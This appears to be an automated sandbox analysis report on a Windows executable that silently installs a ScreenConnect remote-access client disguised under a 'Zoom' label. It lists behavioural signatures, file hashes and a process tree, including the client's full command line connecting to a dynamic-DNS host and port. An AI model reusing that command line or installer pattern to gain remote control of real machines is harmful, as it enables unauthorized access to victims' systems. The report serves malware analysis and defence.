Overview

overview

8

Static

static

1

4e81851729...53.exe

windows7-x64

8

4e81851729...53.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    64s
  • max time network
    111s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    12/08/2024, 05:08

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    4e81851729d58f321bb83bdb03200f62bc5ee56e0703b2d609a3923a033d5b53.exe

  • Size

    5.2MB

  • MD5

    0ed9b8e9f9b85a6af4946510f9299ff5

  • SHA1

    51496e2d591117c094e163985b274e6ef947044c

  • SHA256

    4e81851729d58f321bb83bdb03200f62bc5ee56e0703b2d609a3923a033d5b53

  • SHA512

    1885905a2e1b0f47dedce304e219f629336c42e952c0d9f83eda1111e36ad1d882919465c9be397154c9ac39cc60d3190ce04121d3479840ee7c0b2e11654a9e

  • SSDEEP

    98304:5ps6efPfBOPvLtabi4X0MV+dYdcGt7VIb4:zfefPJws3V+a

Score
8/10
discoverypersistenceprivilege_escalation

Malware Config

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 23 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\4e81851729d58f321bb83bdb03200f62bc5ee56e0703b2d609a3923a033d5b53.exe
    "C:\Users\Admin\AppData\Local\Temp\4e81851729d58f321bb83bdb03200f62bc5ee56e0703b2d609a3923a033d5b53.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\b61627138138a03e\setup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2464
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2852
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 89A133D74318C4F8B257C08E51E1A448 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC207.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259572918 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2896
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A5F48651A763DBAD755415B1A385815C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2036
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding C91727DC2432CE99AC712727FBDB3CAC M Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:572
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
      PID:1984
    • C:\Windows\system32\DrvInst.exe
      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000300" "00000000000005B4"
      1⤵
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      PID:1328
    • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exe
      "C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=poyttwq.zapto.org&p=8041&s=34d5aacd-9022-4113-a12a-4a420f9df1b4&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&c=Zoom&c=&c=&c=&c=&c=&c=&c="
      1⤵
      • Sets service image path in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2416
      • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe" "RunRole" "72779708-1099-4e95-a490-f933ceb14d58" "User"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        PID:3016
      • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe" "RunRole" "384924e3-92ce-4506-9a83-3697597ea315" "System"
        2⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: AddClipboardFormatListener
        PID:2168

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\f79317e.rbs
            Filesize

            213KB

            MD5

            8f82558723b1139f7f750abaa06b2289

            SHA1

            05fdaee5ebe71bdaf8506cb21ef4acf6a719db8e

            SHA256

            be0ddc02361097d438e53e66251438f069d38300e8257cbc023ff401be778b5f

            SHA512

            7722c08a6fa12263247e4e413048d1cf3db1cc83509dd1754a82c94ca24a0be3d07e358bc3bad30242c1bfa57c460ae7a7991d6922d0a74484eab8ad659a5a47

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\Client.Override.en-US.resources
            Filesize

            343B

            MD5

            953c4cbb0ff640008d2402eebf774c6c

            SHA1

            620c6df6ed6edae888c160b26a4791a91336c27f

            SHA256

            12191483feb8db21c4b7ecd039be74de31710326b9ff1466d9bd6f53329259f6

            SHA512

            f992b3b9d284845e1b996d4ae6997834c289471d9ae2b5f912f8bb7d53379b3f3b611a12a1dad66e916b072bc1b6eed3071e109d71e80df190735680c388f61c

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\Client.en-US.resources
            Filesize

            47KB

            MD5

            3e83a3aa62c5ff54ed98e27b3fbecf90

            SHA1

            96d8927c870a74a478864240b3ace94ad543dfb8

            SHA256

            2d88b97d28be01abca4544c6381a4370c1a1ce05142c176742f13b44889ddf90

            SHA512

            ea9d05a4aa1ee5cccc61c4f5e8994efba9efff0549b69577bef1f2a22cce908739124eff1e0db5cfdd69e077ad2d7cdb1307de92d79673c9309ee621cb139956

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\Client.resources
            Filesize

            26KB

            MD5

            5cd580b22da0c33ec6730b10a6c74932

            SHA1

            0b6bded7936178d80841b289769c6ff0c8eead2d

            SHA256

            de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

            SHA512

            c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.dll
            Filesize

            60KB

            MD5

            22af3a23bd30484514cdacf67c5b3810

            SHA1

            e92a4eaee9d896964de541ce2f01c2404b638258

            SHA256

            7c5442121dba2a30ab9579ec08e111ded372cf9cf90fb3256f273980b975afa9

            SHA512

            95e40b27e90fce7ca85e76afbbc16eb62b4bb977664702b987de2eb2294e6fe9e6df5610ec7b2362c2c68493313f30fbbcbd3446dbe8ae2fa47b89407f5d5936

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exe
            Filesize

            93KB

            MD5

            dc615e9d8ec81cbf2e2452516373e5a0

            SHA1

            ec83d37a4f45caeb07b1605324d0315f959452e9

            SHA256

            e9ab064ed381c29a3930f75ca3e05605c6ee07f30a69c043f576a5461de3bafc

            SHA512

            82fe00447fb9785264dfb8032399adf6d33d91d71058212d252742c9e5fd54f5a52f6baf4fb05e95f9a4055057c60a33a7c1c642f18a6a4e045b49be88fa5d9f

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.Windows.dll
            Filesize

            1.6MB

            MD5

            29454a0cb83f28c24805e9a70e53444a

            SHA1

            334202965b07ab69f08b16fed0ee6c7274463556

            SHA256

            998cc3f9af5bd41ccf0f9be86192bbe20cdec08a6ff73c1199e1364195a83e14

            SHA512

            62790920974a2f1b018d466ae3e3b5100006a3c8013f43bdb04af7074cfe5d992caaeb610de2b1b72ff0e4acf8762db1513a4a0cf331f9a340ae0ce53c3be895

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe.config
            Filesize

            266B

            MD5

            728175e20ffbceb46760bb5e1112f38b

            SHA1

            2421add1f3c9c5ed9c80b339881d08ab10b340e3

            SHA256

            87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

            SHA512

            fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsCredentialProvider.dll
            Filesize

            746KB

            MD5

            f01a59c5cf7ec437097d414d7c6d59c4

            SHA1

            9ea1c3fbf3b5adbe5a23578dea3b511d44e6a2dd

            SHA256

            62b405f32a43da0c8e8ed14a58ec7b9b4422b154bfd4aed4f9be5de0bc6eb5e8

            SHA512

            587748ad4dd18677a3b7943eab1c0f8e77fe50a45e17266ba9a0e1363eda0ff1eabcf11884a5d608e23baf86af8f011db745ad06bcdecdfd01c20430745fe4bb

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\app.config
            Filesize

            1KB

            MD5

            1c8d105b08b909f6c92540c77616fa9d

            SHA1

            f24b3a6e4fbe285c0382e6a2bd221167979cf4b1

            SHA256

            38edd3df8e7edb8decb53d1284f8ef151942212bcaaad4e3c000cf16c0f59082

            SHA512

            368f4adaae496360df31987196713bfa6f97c0599db62ad623805582f26e0521b3e22abefd7efe657a7612adaa0e64ba5c7369edf523595658b276521cb4dca4

            Download Submit

          • C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\system.config
            Filesize

            945B

            MD5

            fe3faf3e6452d7ed1e3764e2a8c12453

            SHA1

            34e86b6b91a3e45cd69699574c39ccc80644c247

            SHA256

            29cd679a36a4631e10f8e11864300aa4062abe7769cab6e50d3c351dcd103d84

            SHA512

            6f0b710e38cf743d3b34458dbc05ac9f7794697b39e453025d6d05a0ae9b7671ec3e30c7ffb94a0711a7885d97310585c70759babab701e286817f0457d85c7a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MSIC207.tmp
            Filesize

            1017KB

            MD5

            8d94c9f4c07b76b4e32daffcc51109da

            SHA1

            62e31a89c488d6745abb72a3071f688fd6180d33

            SHA256

            2b35c0e4088b2a7728fa7bc6a5bfdefed7665598de6d49641fdf5d1f1271a4d7

            SHA512

            0092cbbd95777e6931864d61931efdf3a349f79c575030cad9a1771432f52e1bdc25d5640e2923d202c42c2ce242d00187486334a946e97319d48211233eb0ac

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\b61627138138a03e\setup.msi
            Filesize

            10.4MB

            MD5

            971202dcdce2f1e4fad3b8ea472bede8

            SHA1

            8eb1433f3784371941e340b7ff94277e39207f0c

            SHA256

            666aa713579df90134c83e3297eba42dd7d0d35bb343b9cd94af0793e8f8a0ab

            SHA512

            e03807d46a264ef60429dfeeb0099211d58b0b62bcf3da13107139af3c1d386c0a1a9abf59e5ccea3abdb479082cfbff9fa87617012e94db9747ba35a1dde273

            Download Submit

          • \Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.Client.dll
            Filesize

            188KB

            MD5

            6bc9611d5b6cee698149a18d986547a8

            SHA1

            f36ab74e4e502fdaf81e101836b94c91d80cb8ea

            SHA256

            17377a52eeae11e8ee01eb629d6a60c10015ad2bb8bc9768e5c8e4b6500a15ed

            SHA512

            3f23670d0ba150de19a805db6beb6eed8538bbad6fbe3cc21d17d738a43cf411c679a23cea11549e69be0321e672f740791d40e92498aef9d1f8650743ee85ea

            Download Submit

          • \Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe
            Filesize

            573KB

            MD5

            5dec65c4047de914c78816b8663e3602

            SHA1

            8807695ee8345e37efec43cbc0874277ed9b0a66

            SHA256

            71602f6b0b27c8b7d8ad624248e6126970939effde785ec913ace19052e9960e

            SHA512

            27b5dcb5b0aeadf246b91a173d06e5e8d6cf2cd19d86ca358e0a85b84cd9d8f2b26372ef34c3d427f57803d90f2e97cf59692c80c268a71865f08fc0e7ce42d1

            Download Submit

          • \Users\Admin\AppData\Local\Temp\MSIC207.tmp-\Microsoft.Deployment.WindowsInstaller.dll
            Filesize

            172KB

            MD5

            5ef88919012e4a3d8a1e2955dc8c8d81

            SHA1

            c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

            SHA256

            3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

            SHA512

            4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

            Download Submit

          • \Users\Admin\AppData\Local\Temp\MSIC207.tmp-\ScreenConnect.Core.dll
            Filesize

            519KB

            MD5

            b319407e807be1a49e366f7f8ea7ee2a

            SHA1

            b12197a877fb7e33b1cb5ba11b0da5ca706581ba

            SHA256

            761b7e50baa229e8afcd9a50990d7f776ddb5ed1ea5fbb131c802e57cf918742

            SHA512

            dc497643790dc608dece9c8fe7264efedd13724bd24c9bf28a60d848b405fddefb8337a60f3f32bb91518910e02c7a2aaf29fc32f86a464dfcafa365526bdb7f

            Download Submit

          • \Users\Admin\AppData\Local\Temp\MSIC207.tmp-\ScreenConnect.InstallerActions.dll
            Filesize

            21KB

            MD5

            b0585159161d50e330b7f8eda50a2770

            SHA1

            8636fab3ce6c21a42d3e5fbd495c2ddad4279162

            SHA256

            ca9e51d51f24e16428d1b0e9a0829a44da2678bfc7ba00f0b46a57dcd6d734b8

            SHA512

            e9ae99bdce64ca4282fa4580d3b081f7d0874c756aef77fb58e10db148e2f670ba48667ce62033c6f514ff825dc54c1bdbae2c7f8d5f9355486402cf75e1d5ad

            Download Submit

          • \Windows\Installer\MSI3583.tmp
            Filesize

            202KB

            MD5

            ba84dd4e0c1408828ccc1de09f585eda

            SHA1

            e8e10065d479f8f591b9885ea8487bc673301298

            SHA256

            3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

            SHA512

            7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

            Download Submit

          • memory/2416-113-0x00000000039E0000-0x0000000003A9E000-memory.dmp

            Filesize

            760KB

            Download

          • memory/2416-87-0x0000000001040000-0x00000000010C8000-memory.dmp

            Filesize

            544KB

            Download

          • memory/2416-91-0x0000000003C10000-0x0000000003DBA000-memory.dmp

            Filesize

            1.7MB

            Download

          • memory/2416-80-0x0000000000390000-0x00000000003A6000-memory.dmp

            Filesize

            88KB

            Download

          • memory/2416-83-0x0000000000390000-0x00000000003A6000-memory.dmp

            Filesize

            88KB

            Download

          • memory/2416-111-0x0000000000B00000-0x0000000000B36000-memory.dmp

            Filesize

            216KB

            Download

          • memory/2548-1-0x0000000000250000-0x0000000000258000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2548-0-0x0000000000DA0000-0x00000000012C5000-memory.dmp

            Filesize

            5.1MB

            Download

          • memory/2548-3-0x0000000000C70000-0x0000000000CF8000-memory.dmp

            Filesize

            544KB

            Download

          • memory/2548-2-0x00000000052A0000-0x000000000556A000-memory.dmp

            Filesize

            2.8MB

            Download

          • memory/2548-7-0x0000000000DA0000-0x00000000012C5000-memory.dmp

            Filesize

            5.1MB

            Download

          • memory/2548-4-0x00000000003A0000-0x00000000003C2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2896-31-0x0000000004750000-0x00000000047D8000-memory.dmp

            Filesize

            544KB

            Download

          • memory/2896-23-0x00000000007F0000-0x000000000081E000-memory.dmp

            Filesize

            184KB

            Download

          • memory/2896-27-0x0000000000850000-0x000000000085C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/3016-124-0x0000000001190000-0x0000000001224000-memory.dmp

            Filesize

            592KB

            Download

          • memory/3016-125-0x00000000004D0000-0x0000000000506000-memory.dmp

            Filesize

            216KB

            Download

          • memory/3016-126-0x0000000000A60000-0x0000000000AE8000-memory.dmp

            Filesize

            544KB

            Download

          • memory/3016-127-0x000000001AEB0000-0x000000001B05A000-memory.dmp

            Filesize

            1.7MB

            Download

          • memory/3016-128-0x0000000000520000-0x0000000000536000-memory.dmp

            Filesize

            88KB

            Download

          • memory/3016-129-0x0000000000530000-0x0000000000546000-memory.dmp

            Filesize

            88KB

            Download